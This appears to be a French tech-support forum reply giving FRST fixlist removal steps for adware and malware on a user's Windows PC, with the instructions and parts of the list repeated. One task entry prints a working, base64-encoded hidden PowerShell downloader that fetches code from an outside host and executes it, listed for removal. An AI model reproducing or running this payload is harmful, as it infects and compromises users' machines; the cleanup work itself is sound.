Task: C:\WINDOWS\Tasks\ESGHXDSL.job => C:\Users\Hervé\AppData\Roaming\ESGHXDSL.exe <==== ATTENTION
C:\Users\Hervé\AppData\Roaming\ESGHXDSL.exe
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Fetokogl => ""="service"
FirewallRules: [{D372A476-1D87-40C4-8BF4-788BC52C0F85}] => (Allow) C:\Program Files (x86)\SpringFiles\SpringFiles.exe
FirewallRules: [{B1F902C2-531A-4F82-8072-3CD122A83686}] => (Allow) C:\Program Files (x86)\SpringFiles\SpringFiles.exe
FirewallRules: [{CFF6DC05-F65D-4B99-AA9E-A9C9BF7CA86F}] => (Allow) C:\Program Files (x86)\SpringFiles\downloader.exe
FirewallRules: [{7744FEB6-8780-407B-A188-19C5CF091466}] => (Allow) C:\Program Files (x86)\SpringFiles\downloader.exe
FirewallRules: [{4C9DBEC0-8715-4158-8F00-0B3C3038BE6C}] => (Allow) C:\Program Files (x86)\Boxore\Boxore\Node.exe
Hosts:
cmd: ipconfig /flushdns
EmptyTemp:
end
--> Enregistre le fichier dans le dossier Téléchargements (au même endroit que FRST) sous le nom fixlist.txt
--> Lance FRST (Sous Windows Vista/7/8/10, clic droit sur FRST > Exécuter en tant qu'administrateur).
--> Clique sur Corriger. Patiente le temps de la correction.
Note : si l'outil a besoin d'un redémarrage, laisse le système redémarrer normalement, l'outil terminera son travail.
--> Une fois la correction terminée, un rapport Fixlog.txt remplacera le fichier fixlist.
--> Héberge le rapport sur pjjoint.malekal.com et copie-colle le lien fourni dans ta prochaine réponse.
--> Ouvre le Bloc-notes.
--> Copie-colle le texte en gras ci-dessous dans le Bloc-notes :
start
CloseProcesses:
Tcpip\..\Interfaces\{48b13d44-77a8-4641-87a0-01339f71fc7a}: [DhcpNameServer] 192.16.128.24
SearchScopes: HKLM -> {AA9A4890-4262-4441-8977-E2FFCBFB706C} URL = hxxp://fr.yhs4.search.yahoo.com/yhs/search?hspart=acer&hsimp=yhs-acer_001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2904522178-2082705198-2976089894-1001 -> DefaultScope {8B7A25EA-FD61-4929-9809-589CE2BDDCB2} URL =
SearchScopes: HKU\S-1-5-21-2904522178-2082705198-2976089894-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?PC=WCUG&FORM=WCUGDF&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2904522178-2082705198-2976089894-1001 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL =
SearchScopes: HKU\S-1-5-21-2904522178-2082705198-2976089894-1001 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL =
FF NewTab: hxxp://www.trovi.com/?gd=&ctid=CT3333673&octid=EB_ORIGINAL_CTID&ISID=64083341-7133-4EAB-B6B0-377AFCB4895D&SearchSource=69&CUI=&SSPV=&Lay=1&UM=8&UP=SP8709F269-770D-45EB-8F0D-F10BBDDD2814&D=121915
FF SelectedSearchEngine: Trovi
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\!2AA2D9C8BFD012D468AE465E83FBE2D22AA2.js [2015-12-19] <==== ATTENTION
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\2AA2D9C8BFD012D468AE465E83FBE2D22AA2 [2015-12-19] <==== ATTENTION
S2 Imytwa; "C:\Users\Hervé\AppData\Roaming\JypupoBugju\Pejnoigo.exe" -cms [X]
C:\Users\Hervé\AppData\Roaming\JypupoBugju
C:\WINDOWS\system32\gaj
C:\WINDOWS\SysWOW64\Fetokogl.ini
C:\WINDOWS\SysWOW64\FetokoglOff.ini
C:\WINDOWS\system32\FetokoglOff.ini
C:\Users\Hervé\AppData\LocalLow\Company
C:\WINDOWS\System32\Tasks\Kupbapf
C:\Users\Hervé\AppData\Local\Tempfolder
C:\Program Files (x86)\Software
C:\Users\Hervé\AppData\Roaming\sparta111
C:\Users\Hervé\AppData\Roaming\Opera Software
C:\WINDOWS\System32\Tasks\Browser Beach2
C:\ProgramData\381878aa-2541-1
C:\ProgramData\381878aa-1ac3-0
C:\WINDOWS\rsrcs.dll
C:\Users\Public\Documents\Baidu
C:\ProgramData\Microsoft\Windows\Start Menu\SpringFiles
C:\WINDOWS\system32\Drivers\etc\hp.bak
C:\Users\Hervé\AppData\Roaming\COTNSWBT
C:\Users\Hervé\AppData\Roaming\ESGHXDSL
Task: {0E5055A7-997A-4DC8-AED0-50E4174F14B2} - \avabvyxvdy -> Pas de fichier <==== ATTENTION
Task: {17ED642C-A620-4C2C-88FE-8D827349A9B8} - \RegClean Pro -> Pas de fichier <==== ATTENTION
Task: {207D1DFE-38A5-48BF-9582-C57418A1D99F} - \bvxvyxxvcy -> Pas de fichier <==== ATTENTION
Task: {3F5C24C4-C930-4FD8-BAAE-5738CE9405CF} - System32\Tasks\Browser Beach2 => Rundll32.exe "C:\Users\Hervé\AppData\Local\Browser Beach\{D4002F68-4134-DE2D-6C68-73C837814F5C}\hxr.dll",#1 <==== ATTENTION
Task: {461552BB-002D-45ED-A84D-6AEB1221D9BE} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update -> Pas de fichier <==== ATTENTION
Task: {64F024BE-619F-41D6-A32F-820ABC65CF68} - \One System Care Task -> Pas de fichier <==== ATTENTION
Task: {665FF956-14E6-496E-8442-5D2AFAF4CC95} - System32\Tasks\Kupbapf => C:\PROGRA~1\SHOPPE~1\Upohr.bat
Task: {844977B7-518B-473C-9EF4-817CCD3F4D72} - \SwiftSearch Auto Updater 1.10.0.25 Core -> Pas de fichier <==== ATTENTION
Task: {9E54EB75-3F9A-470B-9626-9EB11B9AF646} - System32\Tasks\{0C0A7F47-0D7E-0A78-7E11-7D087E7E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGMAbwBuAHQAZQB4AGYAaQB4AC4AaQBuAGYAbwAvAHUALwA/AGEAPQBtAEEANQBMAEUAcwB2ADYAZAA5ADcANQBKAGoAcgBpAHIAdwBzAEQAZABMAEgAeQBQAEgAbwBmAHEALQBCAHUAMQBRAEUAQwBoADAATQBYAHoAdQBlAFUAeABoAHAAYQBEADgAcwBsAFQAMQBrAE8ARgBSAC0AegBKAE0ATwB3ADUATwAyAE0AQwBwADAAdwBEAEwATwBwAG8AcgBnAFEAVQAwAEcAVQAxAHcALQBuAHIAYgAyAGQANAAxAEwAeABvADcAcwB4AHkARABwAEMAaABYAFoAMwAtAFcAcAA0AHkARAA3AFoAcQBYAE8AUgAyAGkAUgBTADMAbwBaADYAcQBOAG8AUABLAEsAZgBMAG4AYgBVAGIATAB1AHAAQgBJAHMAMAA0AGgAVwBBADcARwB4AGMAVgB5ADUAZwBzAE8AbwBOAGcAeQBpAEoAUwBRAEgANAAzAEoAbgBYAEwASgBzADkAcwBjAFMAYgBnAE4AWAB2AHIAUwByAEQAZwBEAHgAUQBmAHMAZQByAHgAawBsAHEAQQB5AHAAQQBaAG4ANAB5AEcAaQBKADYAUwBLAEIATgB3AGcAXwBoAGgANwBvAE4ARwB5AHEAZgBrAHUAUgA1AFYAdAA1AGwARAB4AF8ASQBVAEIAbQBKAFAAdwBzAGEAdQBMAHoAMwBWAFMAWABSADEAUQBEAGIAawAxAHQATQBjAFMAQQB6AHMAdQBtAGMAdABLAEYAWAAyAHIARQA3AHYASQBpAEYAZABtAHoASQBSAFcAYwBYADgARgBHAGIAbQBuAHAAcgA5AFgAUABIAFcAbQBrAFMASwBxADYAUQBaAGIAawBOADkAOABtAHEAOQBHAHkAXwA3AEMAUAB4AGEAZABTAEIAYwBVAEIAaABjAG0AUgBqAEgASQBNAGIAcQBGADMAbwBaADAAYQB1AEgASQBUAEEAZABuADgAbQB5AGYAZwBpADEARwB3AHoAdwBOAGUAdwBSAEUAXwBGAC0ATQBvAGMASQA2AHoAUgA3AEgAZABoAFUAVgBaAG4AaAB4ADUALQAyAFgASgBMAGwAYgBzAFMASABSAFUAaQBWAGgAeABMADIAOQA3AGkAeABaADgARwBFAGIAQgBWAEYAbABhAHUATwBzAGcARgAtAHkAMwB1ADIAQQBDAFAALQA1AFUASQBSAEwAVQBzAFIAXwB0AEsAUABpAEUAWAAyAFAAdgBpAHAAYQBfADcAagBzAEcARABvADQALQBtAGQAbQAzAE8ATQAyADYAUwBLAEoAdABtAHYAcABaAE0AcgBhAFIAeQB6AGwAdgB0AC0AVgBEAGYAdgBLADQAdwBmADYAbQBGAF8ATwBUAF8AWQBCAEsANQA0ADMAegBOAGgARgBNAFoAZQB4ADIASAB2AEgAeQBFADkARQBQADQAUgBDAHYAawBuAGgAMgA0AGEASgBfAEMAUABaAGIAQgA0AFkATAB3AHQAUwAtAFAAcQBMAEgALQBfADIAdABFAGkAaQBpAHMARwBKAE0ANwBYAGwAbABLAHIARwBVAFgAWgBsAHIAegBZAE8ARABPAHIASgBhADEAWAA2ADgAMgAzAEgAZQBHAFQAQwBtADYASQBMAEIAMABIAGYALQBXAEgAbQBiAE8AVwBmAG8AbwBRAG8ANgBBADEAUwB0AGUAcgBVAGcANgAtAEYASABBAGQAagB0AHUASABzAFcAQwBoADgAcQBuADEAdwA5AEIASgA0AEkASgBwAEEAVgBfAFMAeAAzADIAeQBJAEcAWABLAFoASgB4AGwANwBsAF8AaQBlAGcAVgBmAEwAQQBsAF8AZgB1AEYATgA0ADMAQwBqAGEAZwBYAE8ATgAwAHEARABqAFkAYwB6AFQAcABhAE0ATwA0AHEAcwBlAHgAUgB4AE8AOQBhAGYAMQBxADUAUwA4AEoASwBwAHYAQgB5AGMASwBrAGcAQQBnAE8AVABtADUAMgBWAFcAQwBNAFYAMQBrAHgAdABTAHcAUwBSAFYAWQBuAF8ATAB2ADkAcgBJAEcARQBVAHcAcgBxAEgASQB0AEwAMAByAGcAUgA2AEoAeQAzAGYATAA1AEcAcABRAFUAeQBxAGQAUQBlAHEAaABvADcARAA0ADUAeQA0ADcAegBCAEYAUgByAFkASQAxAGoASwB0ADYAMwBZAEIAZQBmAFkAeQA3AEcAYgA0AGIAeQB4AHoAbwBDAFoAcQBrAGEAQgBJAG0ARQBJAEIAMABFAEIARwBVAEIAaABaAFoAMQBkAGcAdgBuAHAAZgBuAGsAOQBiAG0AZwBUAEMAZABjAG0AaQBEAFYAMgBlAEkAUwBpADIAZABsADEAcwBFAGMAOAAmAGMAPQBzAHAAWQBGAFEAYgBmAFcASwB4AFkAQwB2ADAAdwBNAHgANQBnAGIANwAzAFgARgAtAFcANwBjADgAMwB2AGMATQA2ADAARgBBADYANQB5AGQAVwBHAEEANABrAGUAWQBnAEkANwBWADMAXwB2ADMAZABhAEYAbAAxAFEATABGAGUASgAtADgAVQBsADYAbQBzADEANABNADEAYwBIAEsASQBwADUAOABSADcAbQA0AEQAcwBSAEoAbQB5AE0AZQBwAGsAOABSAF8AVABOAEgAYwBPAEEAYgBVADkAVQAtAG0ARAB6ADMAVwBJADUAWQAtAEkAZwBHAFMAVwA4AFAAOAB1AEEAMgB5AHIAMwBtAG4AbwBVAGcASgB2AE4AMgBFAFMAVgByADAATABYADMARgBXAF8AUQB3AEsAQwB1AG8ATABIAGUAVQBjAFQAXwBzAGUARgBOAGMAbwBsADIARwBHAEYAagBYAFcATgBTAGgAZQBxAFMAZwBmAFAARwAyAC0AVwBUAEYAVQBsAFgAbAB5ADAARQBZAGsAYwBMADMAWABnAEkAbAAtAFcAbQBPADIAZwB4ADYAaAA5AFgASwBKAFMAdgBaAFIAdABKAGYAVAB0AHMAZABmAGIAbwBFADgAXwBMAFcAZgA0ADEAQgBqAGoAdQBaAHAASgBqAEIAMABtAHYAZwAzAFcAMwA4AEwAaQA1AFMAMQByAFcAYwByAGoAYwBDAGQAUABMAEYAVABxAEcAWQBUAG4AUQAxAGYAUQBXAHMANQBUAE4ALQBsAEIALQBhAE0ANQAxADIASAB2AEgAbABnAE8ASABjAGEAUQBCAHAAMABVAFIAZgBHAG4AUQBSAEIAOABXAFYAVwBQADMAcABOAGIAdABiADEATgBRAF8AZABXAFoAeABUADQASQBHAHoASABLAFAANgBLAGMAdQBfAEYAZQBHAGoANgBWAFYANABVADkAVgBPAGgAeAB6AFcAaAB2AGsARwBPAHcAXwBFAE0ALQBUAEEAeABFADUAQgBEADIAdwA0AHIARQBIAEEARQBBAGwAXwBBAHUAWgBIAFcAbgA0AEQAXwAwAGEAeABwADQAWgBPAGgARAB1AGsAYQBMAGEAOQAzAHgAbgAzAEQAWgB5AHMATgBGAEgAegBwAEkALQB4AFAAeABoAGgAcwBBAEMARABmAE4AcgA5AGYARQB6AGUAMAB4AEIAOABuAGYARABCAHMARQBHAGcAbAA4AFEANABWADkAZQBRAFMAVgByAHkAVQBpADMAWgBQAGwAUAAwAE8AagBzADUAcQA5AEkAOABKAEQAeABwAFkANwBEADgAZgA1AHcAUABRAEIATABIAEoARAAwAHgAYwBlAGEAdgBJADYATwA0AHkAUAB6AGcARwBnAGYASwBWAEsAVgA4AHAAYQA4AHQAbwB3AEEASgBCAE0AdQBOAFUAMABjAFUAZQBCAGcAVABEAE4ATwBsADAAMAAxAHEARgB3AGQAbQBaAE0AbgBNAHAASQB5ADMAQgB2AEgAWQBHADEAMgBrAFEAYQB0AEUAdwBlAEEAUQB4AFkAawBtAHQAWABNADkARQBTADIAMgBQAG0ATQA3AC0AQwA3AHYAaABfADYAagBXAGwAMABRAGsAQQBrAG8ANQBKAHEAWABwAFcARgBfAGsATgAxAHoARgBMAGIAXwBIAFcAZABEAHgANgA5AEsAOAByAEkANQBMAHEAcAAzAEsAYgB0AHAAagBSAHgAVgBkADkAUABYAGMAUgBPAHMAUgA5AG0AMABWAHMAMgBWAGgAZQAwAHMAagBuAHYAMwBTAEEAZABUADYARQAyAEcAWgAyAE4ATQBUADYATABRAGsAZAByADQAaQBoAGsATABsAFUALQBPAGMATgBuADUAYQBaAHoAOQBBAHMAeQBiAE8AcwBLAHAAaQBlAFUAVgBSAEMANQBLAHoAZABZAG8AZgA2AGgAVQBiADUAbQA5AEsARwBGAGIAbwBXAG0ASgB1AGoAUQBiAEIAbQBhADkASwBpAGsAOABtAEoAUgB4AEwASQAtAHAAVgB1AFgAOABWAG8AaABDAFkASgAwAG8AbwBnAEIAVgBGADAATABrAE4AcABLAHAAXwBwAEoAVQBHAHUAWgBzAFAAbgAzAE4AegB4AEkAZQBoAEMAVwBIADIAeABrAFIAWQBfAHIASgBwAFUAOQBTAGMAUwBsAHQAQQBNAEEAWABtAHIAeQBoAFkAVABzAHcAVABSAGUAdgB5AGIAWQAyAFoALQBqADAAMABJAEEALQB3AGgATQBRAG0AagBnADYARwBYAFYASgBaAEEAdwBJAFoAYwBaAGIAZwBDADIAMQB2AHQAUQBOAE8AOQBqAFQARgA0ADgAagAtAHoAWgBuAFkAQwBUAFoAaAA1AG0AUABCAHAAWgBGAGMASwB0AHAAdQBWAGQAaQBOAFIARQAzAHoATQB4AG4AMQBoADgAaAAzAEQAOQA4AGgAdQBnAFIAJgByAD0ANQA1ADcAMwAwADMANQA1ADkANAA5ADgAMgA1ADEANwA0ADIAOQAiADsAJABzAHQAcwBrAD0AIgB7ADAAQwAwAEEANwBGADQANwAtADAARAA3AEUALQAwAEEANwA4AC0ANwBFADEAMQAtADcARAAwADgANwBFADcARQAxADEANwBBAH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBMAFkAVQBXAFkAWABQAE8AIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {A201EE12-5587-4001-BC14-4C60BF3DA088} - \Run_Bobby_Browser -> Pas de fichier <==== ATTENTION
Task: {BD580D18-D2C3-441C-A1EB-D5CC559A5C84} - \SmartWeb Upgrade Trigger Task -> Pas de fichier <==== ATTENTION
Task: {CBFD9A8D-F1F1-4751-898C-7AE05385E4F2} - \One System Care Run Delay -> Pas de fichier <==== ATTENTION
Task: {ECC165B0-4ADC-4790-B108-7024A106D1FE} - \One System Care Monitor -> Pas de fichier <==== ATTENTION
Task: {ED42D5D1-C6FA-411E-83B8-10487254D68C} - \crash_service -> Pas de fichier <==== ATTENTION
Task: {EFFDEE4F-AEB8-4BDA-8284-98E1CF3B3EBB} - \Browser Beach -> Pas de fichier <==== ATTENTION
Task: C:\WINDOWS\Tasks\COTNSWBT.job => C:\Users\Hervé\AppData\Roaming\COTNSWBT.exe <==== ATTENTION
C:\Users\Hervé\AppData\Roaming\COTNSWBT.exe
Task: C:\WINDOWS\Tasks\ESGHXDSL.job => C:\Users\Hervé\AppData\Roaming\ESGHXDSL.exe <==== ATTENTION
C:\Users\Hervé\AppData\Roaming\ESGHXDSL.exe
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Fetokogl => ""="service"
FirewallRules: [{D372A476-1D87-40C4-8BF4-788BC52C0F85}] => (Allow) C:\Program Files (x86)\SpringFiles\SpringFiles.exe
FirewallRules: [{B1F902C2-531A-4F82-8072-3CD122A83686}] => (Allow) C:\Program Files (x86)\SpringFiles\SpringFiles.exe
FirewallRules: [{CFF6DC05-F65D-4B99-AA9E-A9C9BF7CA86F}] => (Allow) C:\Program Files (x86)\SpringFiles\downloader.exe
FirewallRules: [{7744FEB6-8780-407B-A188-19C5CF091466}] => (Allow) C:\Program Files (x86)\SpringFiles\downloader.exe
FirewallRules: [{4C9DBEC0-8715-4158-8F00-0B3C3038BE6C}] => (Allow) C:\Program Files (x86)\Boxore\Boxore\Node.exe
Hosts:
cmd: ipconfig /flushdns
EmptyTemp:
end
--> Enregistre le fichier dans le dossier Téléchargements (au même endroit que FRST) sous le nom fixlist.txt
--> Lance FRST (Sous Windows Vista/7/8/10, clic droit sur FRST > Exécuter en tant qu'administrateur).
--> Clique sur Corriger. Patiente le temps de la correction.
Note : si l'outil a besoin d'un redémarrage, laisse le système redémarrer normalement, l'outil terminera son travail.
--> Une fois la correction terminée, un rapport Fixlog.txt remplacera le fichier fixlist.
--> Héberge le rapport sur pjjoint.malekal.com et copie-colle le lien fourni dans ta prochaine réponse.